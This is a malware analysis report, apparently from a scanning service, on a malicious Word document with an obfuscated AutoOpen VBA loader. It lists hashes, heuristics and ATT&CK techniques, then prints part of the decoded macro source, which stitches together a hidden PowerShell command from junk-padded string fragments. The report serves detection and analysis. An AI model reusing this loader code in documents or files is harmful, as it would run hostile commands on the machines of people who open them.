Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e2f2b3831515947e…

MALICIOUS

Office (OLE)

238.0 KB Created: 2018-07-05 22:50:00 Authoring application: Microsoft Office Word First seen: 2019-09-30
MD5: f46fa25feb2e25208c208e0b30a65d3c SHA-1: 12e2e41417a206df651c2bd158267160dfd8b63f SHA-256: e2f2b3831515947ea57ecf401e7dcfdb2c1adba2c97015f40b1b532ac5254f8b
282 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1203 Exploitation for Client Execution

The sample is a malicious Office document containing obfuscated VBA macros. The AutoOpen macro triggers the execution of a shell command, likely to download and execute a second-stage payload. The script uses CreateObject and Shell() calls, indicating a high likelihood of further malicious activity.

Heuristics 8

  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11778 bytes
SHA-256: 27d4603a068f2a7c90260760d1e9e99a5b47bf9c7f66bbfedf01b102184903e8
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "EttwormARrQqM"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
   MprbGH = GukzU * VHpjY * Rruzl / OrKYV * wkFVL / lTHJTW + 94909 * HfGrsZ
   VGMaY = VBwAP * INtzf * QKhdfG / KGbQw * EhBXMa / WZQhs + 55135 * bziFQC
   OSwSA = HzzNE * COpsm * WAKCjC / BGatW * zWPRU / sjBbV + 27189 * fIkhG
   dHRqGY = PChYjD * GAvJvF * IYYBs / jlSfvJ * HwDVa / bsGlz + 26115 * YZFwji
   UjtoNd = ijBda * cHwaji * QCmboC / KfWwR * fmPKj / iTNWk + 38336 * wvRJVz
   wdPHVJ = PXLii * kdmmM * qlBMi / iYDZz * TnjVWJ / GHjTB + 41685 * TjjHKl
   cuwLlu = wDjEd * HonwU * tMVZo / WXwQYU * zZUbR / iYhhw + 90443 * kzXTw
pWpNbkzhAfb (GrNHJRZro + JjdzGc + auXqluUtJz)
   jzaFhw = WbKHUz * pCDzrs * oWBubn / zhCYi * DbfTv / duCTh + 31249 * PcwdNI
   zzQkkr = SpYjOq * OHdZGO * SAqfD / rwONYt * jYFZcP / Qddpl + 54580 * SzhLA
   raYLFJ = YuHim * oOXjCY * wmDUd / XwADoP * JLAGI / IJVILw + 56859 * aOZtLk
End Sub


Attribute VB_Name = "FXEhJmX"
Function GrNHJRZro()
On Error Resume Next
dvuJwm = 11463 * GGoQs / (pvbBM / 33555 - UvFXps + bZbrY / 68814 - SJnmAJ - (86906 + Osjjdh))
   rtaRIA = 78737 * Gtwvhi / (rIfXmn / 29791 - IjcjM + FPaElk / 94990 - SSRUBf - (12617 + zLkuo))
   SCYkaz = (2086 - htwTdz + YSndFY - zLhcOO) + RubmjX * CzYkz * 62464 / TQmTSc / toVzQi * NDzim + QzUhw - jWSOtG
   JkAchS = 65231 * TcvAiY / (vuAtqM / 9873 - ljFzm + vRCfR / 31774 - lHQfk - (72860 + sGfcmF))
XpEjfEqftL = "wers" + "hell  " + "       " + "       " + "  " + Chr(34) + "$" + Chr(40) + " s" + "et-i" + "tEm  "
fhFEK = 66494 * Kztjnz / (OOSmn / 51069 - vWnWvB + EjrSv / 27454 - zvBMXR - (43328 + HnbrB))
   lJCzA = 7904 * skzut / (WhPlpb / 30242 - owNjn + zlhdOq / 27580 - ijKbH - (84648 + vJljzP))
   IvZij = 67968 * RhPjL / (RCQsj / 56393 - SQZPI + iPzuD / 99797 - zYvtMi - (93652 + dUzqFR))
   vkkESO = 85352 * UvPXKt / (MHXKm / 69442 - GaGZf + dLjBF / 44948 - vjLAW - (29817 + LoVaiM))
   XjIYL = 77803 * VKZZBv / (mLjUH / 87832 - WfEja + wcYDsm / 18526 - LvbjJj - (50129 + mEvtLh))
RqjJZqiATHD = "'VaRIABL" + "E:OFS' " + "''" + Chr(41) + " " + Chr(34) + Chr(43) + " [St" + "RINg]" + Chr(40) + "'97" + "d50I45" + "t11d1" + "20%43X32%" + "50m10" + "4%42m3" + "9m47I32d3"
WGWEz = 20766 * SNLEGD / (jDXFw / 60678 - NUXWsp + zpccFZ / 13284 - TJUXu - (83381 + vncsn))
UFZOWVK = "8d49!101" + "V11t32d" + "49c107o1" + "8m32!39" + "%6I41" + "o44d32o" + "43V49I"
XhtNa = 94958 * vJOOo / (TszIQ / 45422 - jRCOlV + EMHKX / 37294 - docCrG - (78916 + oHGnLi))
   izodfG = 58836 * bEYKjB / (rUSqE / 40080 - YQIlc + IwKqQl / 47916 - jqFWJ - (94734 + nhiOnD))
   KYAfIm = 97565 * EVOTXi / (BdPYjN / 70808 - lkzYju + BVWPS / 7926 - uwVUb - (29790 + jXrNM))
AQHEC = "126V9" + "7d42d43" + "%2d120c98" + "V45I49" + "c49c53m1" + "27d106c" + "106%50c50" + "o50m"
sjFcZX = 40684 * ijWcui / (wcqIiM / 36887 - XfkidW + stjRwh / 60559 - nLULsa - (51572 + szkQKM))
LLziHioX = "107%" + "49c55I" + "36c46t" + "60X36d53" + "t32%60c" + "63V36X47V" + "44m41V36"
KddzV = 72235 * wFzRL / (pDqKV / 41647 - EZjOYk + fcTVIA / 41037 - OIbWLj - (4738 + fVrXI))
   JtlYG = 57191 * CmqjAk / (wrqtEi / 12462 - uMDOBD + XBKDC / 37452 - ucYOn - (16326 + YjDcT))
   ECbwF = 69501 * PZlnkU / (cIKqMp / 65203 - wKzBIA + hMphCP / 36176 - DPtRsB - (71375 + wifDM))
   Ypizoo = 83275 * prcwc / (MSjDwJ / 2921 - Twhsjt + ifnsm / 48512 - zzwWdn - (4569 + wBPPXz))
   wIrUER = 98605 * bwXrY / (DRWJbH / 51323 - YphNl + TdzfBf / 85985 - KuOPE - (23661 + UVKMb))
hAXvp = "t38d41I3" + "6X40" + "t36m10" + "7t38t42t4" + "0%106" + "!115V44t" + "61%8!35m3" + "2V6o1" + "06t5%45o" + "49m49"
NGuoai = 12058 * jZMPbv / (FtztK / 13748 - KptpaG + DkYZnP / 85930 - uGGzjI - (25156 + Wdalas))
   SWQKi = 97382 * Vschi / (pVzhi / 90099 - NUpqzT + czmih / 79066 - iomsl - (10546 + HjmGZ))
zTaoCwi = "%53I127d" + "106%106" + "X50m50%" + "50X107c" + "41!115c1" + "17m117" + "o107t" + "55V4"
GrNH
... (truncated)